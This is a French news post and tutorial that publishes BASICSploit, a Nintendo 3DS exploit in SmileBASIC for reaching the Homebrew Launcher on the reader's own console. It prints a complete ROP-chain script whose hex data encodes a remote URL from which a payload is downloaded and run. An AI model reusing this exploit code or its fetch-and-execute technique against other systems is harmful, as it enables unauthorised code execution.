[3DS] MrNbaYoh publie son BASICSploit (pour SmileBASIC)

MrNbaYoh n’a pas chômé ! Alors que le hacker venait de publier il y a quelques jours une vidéo prouvant qu’il avait réussi à exploiter une faille dans le programme SmileBASIC, voilà qu’il revient déjà à la charge en le partageant au grand public. Baptisé sobrement BASICSploit, cet exploit n’est pour rappel disponible que pour les joueurs nord-américains et japonais, étant donné que le fameux logiciel SmileBASIC (une sorte de jeu aidant à l’apprentissage du langage de programmation BASIC) n’est téléchargeable que sur les eShop US et JP.

SmileBASIC 3DS hack exploit kernel MrNbaYoh

0) Pré-requis

  • Une 3DS avec SmileBASIC en version 3.2.1 ;
  • Le homebrew starter kit.

Vérifiez bien que vous êtes connecté à internet, en vous rendant dans le menu Home de votre 3DS et en touchant le petit bouton en haut à gauche de l’écran inférieur (avec l’icône en forme de maison).

Wi-Fi active sur 3DS verification

Notez que BASICSploit n’est compatible qu’avec la version US pour l’instant, mais que l’on peut espérer un portage pour la mouture JP dans un futur proche.

1) Mini-tuto

1.A) La première fois

Décompressez l’archive du homebrew starter kit à la racine de votre 3DS. Si vous ne savez pas comment lier celle-ci à l’ordinateur, consultez ce court tutoriel.

Lancez SmileBASIC, et créez un nouveau projet nommé « BASICSPLOIT » ainsi qu’un nouveau fichier nommé « DOWNLOADER ». Écrivez (à la main…) dans ce nouveau fichier le script qui suit :

IF HARDWARE==1 THEN
   CODE_LINEAR_BASE=&H30000000+&H07C00000-&H00100000
ELSE 
   CODE_LINEAR_BASE=&H30000000+&H04000000-&H00100000
ENDIF


DATA &HDEADC0DE, &H13341C, &H94500D3, &H109924, &H1E6790, &H10ECA4, &H94500A0, &H1C15D8, &HDEADC0DE, &H94500D7, &HDAFC9754, &H115D5C, &H248720, &H94500DB, &H9450108, &H1DFECC, &H9450074, &H256D78, &H109924, &H2554DC, &H1000, &H248A8C, &HDEADC0DE, &H1FBA38, &H70747468, &H6D2F2F3A, &H61626E72, &H2E686F79, &H68746967, &H692E6275, &H61622F6F, &H73636973, &H696F6C70, &H73752F74, &H3132335F, &H725F642F, &H622E706F, &H6E69


DIM ROP[&H27]
ROP[0]=CODE_LINEAR_BASE

FOR I=1 TO &H26
   READ ROP[I]
NEXT

BGSCREEN 0,134217728,16

ROP_COPYBASE_X = 406873
ROP_COPYBASE_Y = 7

ROP_LENGTH = LEN(ROP)

I=0
J=ROP_COPYBASE_Y
X=ROP_COPYBASE_X

WHILE I < ROP_LENGTH
  WHILE I < ROP_LENGTH AND J >= 0
    WORD=SHIFT(ROP)
    BGPUT 0,X,J,WORD
    DEC J
    BGPUT 0,X,J,WORD>>16
    DEC J
    INC I
  WEND
  INC X
  J=15
WEND

BGPUT 0,4759,2,"0017"
BGPUT 0,4759,3,"0D28"

FILL ROP,0

END

Lancez le script. Le programme devrait télécharger toutes les ressources nécessaires puis lancer le menu in-game. Une fois arrivé dessus, choisissez l’option « Download/Update » pour télécharger le payload du hax. Quand il sera téléchargé, vous n’aurez plus qu’à le lancer avec la première « entrée » du menu.

1.B) La seconde et les prochaines fois

Lancez simplement le script nommé « BASICSPLOIT » pour accéder au Homebrew Launcher.

N’hésitez pas à poser vos questions ou à réagir en commentaire ! ;)